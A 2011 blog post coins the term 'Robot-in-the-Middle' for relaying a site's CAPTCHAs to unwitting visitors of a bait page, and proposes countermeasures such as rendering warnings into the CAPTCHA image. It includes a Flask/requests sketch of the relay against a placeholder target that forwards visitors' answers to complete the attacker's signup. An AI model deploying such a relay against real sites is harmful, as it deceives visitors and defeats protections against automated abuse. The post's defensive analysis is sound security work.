Thursday, August 25, 2011

CAPTCHAs and the Robot in the Middle attack

A CAPTCHA is a visual test of humanity used to prevent machines from performing operations that are intended to be performed only by people. Many internet services use such tests to prevent mass automated access. For example, Google requires anyone registering a Gmail account to pass a CAPTCHA test.

The most commonly used CAPTCHA asks the user to type letters that are displayed on the screen in a form which is difficult for OCR software to recognize - see the example on the right.

One way to circumvent CAPTCHAs is to use a Robot-in-the-Middle attack.

In the classic Man-in-the-Middle attack an attacker sits between two legitimate parties and presents himself to each of them as the other. One illustration is the Chess Grandmaster Problem described by Schneier: a poor chess player can break even against two chess grandmasters by playing them against each other - he plays black against the first grandmaster and white against the second, forwarding the first grandmaster's moves to the second and the second grandmaster's moves back to the first. British illusionist Derren Brown performed this trick on one of his shows.
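
The relay itself is mechanically trivial. As a toy illustration, here is a sketch of the loop in Python; the RandomMaster class is a made-up stand-in for a real opponent, included only so the example runs:

    import random

    class RandomMaster:
        """Stand-in opponent that answers any move with an arbitrary labelled move."""
        def __init__(self, name):
            self.name = name

        def reply(self, opponents_move):
            # A real grandmaster would actually consider opponents_move; the
            # stand-in just produces a labelled placeholder move.
            return "%s-move-%d" % (self.name, random.randint(1, 99))

    white_master = RandomMaster("GM #1")   # plays white against the relaying player
    black_master = RandomMaster("GM #2")   # plays black against the relaying player

    # The player in the middle never chooses a move himself - he only forwards
    # each grandmaster's move to the other.
    move = white_master.reply(None)        # white opens the game
    for _ in range(3):
        move = black_master.reply(move)    # hand white's move to black
        move = white_master.reply(move)    # hand black's reply back to white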

In a Robot-in-the-Middle attack against CAPTCHAs the attacker sets up a web-site of his own which requires visitors to pass a CAPTCHA test - and the challenges shown to these visitors are exactly the ones the attacker needs to pass in order to get the desired service from the site under attack. The attacker simply relays each challenge to one of his visitors and forwards the visitor's answer back to the attacked site, so unwitting humans end up solving his CAPTCHAs for him.
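
To make the mechanics concrete, here is a minimal sketch of such a relay in Python, using Flask and requests. The target's URLs and form fields are placeholders I made up - no real site exposes its CAPTCHA this way - and the code only illustrates the flow:

    import uuid

    import requests
    from flask import Flask, Response, request

    app = Flask(__name__)

    TARGET = "https://target.example"     # hypothetical site under attack
    pending = {}                          # relay token -> session with the target

    @app.route("/free-download")
    def bait_page():
        # Start a signup attempt at the target and remember its session.
        token = uuid.uuid4().hex
        target_session = requests.Session()
        target_session.get(TARGET + "/signup")             # hypothetical signup page
        pending[token] = target_session
        # Serve the attacker's own page, embedding the relayed CAPTCHA.
        return ('<form action="/solve" method="post">'
                '<img src="/captcha/%s">'
                '<input type="hidden" name="token" value="%s">'
                '<input name="answer"><button>Download</button></form>' % (token, token))

    @app.route("/captcha/<token>")
    def relay_captcha(token):
        # Fetch the target's CAPTCHA image and pass it straight through to the visitor.
        img = pending[token].get(TARGET + "/captcha.png")  # hypothetical image URL
        return Response(img.content, mimetype="image/png")

    @app.route("/solve", methods=["POST"])
    def forward_answer():
        # Forward the visitor's solution to the target, completing the attacker's signup.
        target_session = pending.pop(request.form["token"])
        target_session.post(TARGET + "/signup", data={
            "captcha": request.form["answer"],             # solved by the unwitting visitor
            "username": "attacker-bot",                    # the attacker's own signup details
            "password": "s3cret",
        })
        return "Thanks! Your download will start shortly."

The visitor believes she is proving her humanity to get a free download; in reality she is registering an account for the attacker.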

This attack is well known, though I haven't seen the term "Robot-in-the-Middle" used for it. So this post has two goals - to propose the term "Robot-in-the-Middle" (or RitM) and to suggest possible solutions to this attack.

The most common defense against Man-in-the-Middle attacks is for at least one of the legitimate parties to securely authenticate the other, in a way that covers all communications coming from that party. A very common example of this is the SSL protocol used to authenticate web-sites. Can such a technique be used against a Robot-in-the-Middle?

Seemingly not. The RitM attack is based on the following assumptions:
  1. All information that can be used by the site under attack as part of the challenge is known to the RitM (since the RitM is being asked by the site under attack to respond to this challenge).
  2. The RitM can pass this information on to the human connecting to the RitM.
  3. Any human receiving this information can respond to the challenge.
It would seem that these assumptions remain true no matter what we do. So is there no way to defend against a RitM attack?

In fact there are steps one can take to mitigate such an attack, targeting the second and third assumptions. First, let's note that through the CAPTCHA the site under attack can communicate information to the human responding to the challenge in a way that the RitM can neither read nor block: the message is rendered into the CAPTCHA graphic itself and made part of the challenge, so a robot that strips it out destroys the challenge along with it.
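
As an illustration, here is a minimal sketch using the Pillow imaging library; the layout, font and noise parameters are arbitrary choices of mine rather than a production CAPTCHA scheme:

    import random
    import string

    from PIL import Image, ImageDraw, ImageFont

    def make_captcha(notice, code_length=6, size=(360, 120)):
        """Render a distorted challenge code plus a human-readable notice into one image."""
        code = "".join(random.choice(string.ascii_uppercase) for _ in range(code_length))
        img = Image.new("RGB", size, "white")
        draw = ImageDraw.Draw(img)
        font = ImageFont.load_default()

        # The notice travels inside the same graphic as the challenge, so a relaying
        # robot cannot strip it out without destroying the challenge as well.
        draw.text((10, 10), notice, fill="black", font=font)

        # Draw the challenge code with per-character jitter to keep OCR hard.
        for i, ch in enumerate(code):
            x = 30 + i * 50 + random.randint(-5, 5)
            y = 60 + random.randint(-10, 10)
            draw.text((x, y), ch, fill="darkblue", font=font)

        # Add a few noise lines across the whole image, notice included.
        for _ in range(8):
            draw.line([(random.randint(0, size[0]), random.randint(0, size[1])),
                       (random.randint(0, size[0]), random.randint(0, size[1]))],
                      fill="gray")
        return img, code

    img, expected_answer = make_captcha("You are registering at target.example")
    img.save("captcha.png")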

Using this we can attack the second assumption ("the RitM can pass this information on to the human connecting to the RitM") by creating a challenge containing information that the attacker would not want to pass on to the human - for example, the user name and password the attacker supplied when signing up for the service.
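
For instance, the text baked into the graphic could be built from the signup request itself (the field names and wording below are my own illustration):

    def captcha_notice(username, password):
        """Compose the text to render into the CAPTCHA graphic."""
        # Reveal only a hint of the password, so the site never displays a full
        # credential, while still making a relayed CAPTCHA costly for the attacker.
        hint = password[:2] + "*" * max(len(password) - 2, 0)
        return ("Creating account '%s' (password starts with %s). "
                "If this is not you, do not type the code below." % (username, hint))

    # The message an unwitting solver would see if a robot relayed this CAPTCHA:
    print(captcha_notice("attacker-bot", "s3cret"))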

Likewise we can attack the third assumption ("any human receiving this information can respond to the challenge") by creating a challenge that a human would not want to answer unless she is actually connecting to the attacked site's service (and not the RitM's). This could be as simple as having the CAPTCHA state that the user is signing up for the attacked site's service, or having it ask the human to verify that her browser has authenticated an SSL certificate from the site under attack.
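
A sketch of such a site-binding notice (the address is a placeholder of mine, not a real endpoint):

    def site_binding_notice(site="https://signup.target.example"):
        """Compose a notice that ties the CAPTCHA to the attacked site's own address."""
        return ("This code creates an account at %s. Only type it if that address, "
                "with a valid SSL certificate, is what your browser shows." % site)

    print(site_binding_notice())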

If you can suggest additional countermeasures against RitM or have anything else to add - please use the comments below.
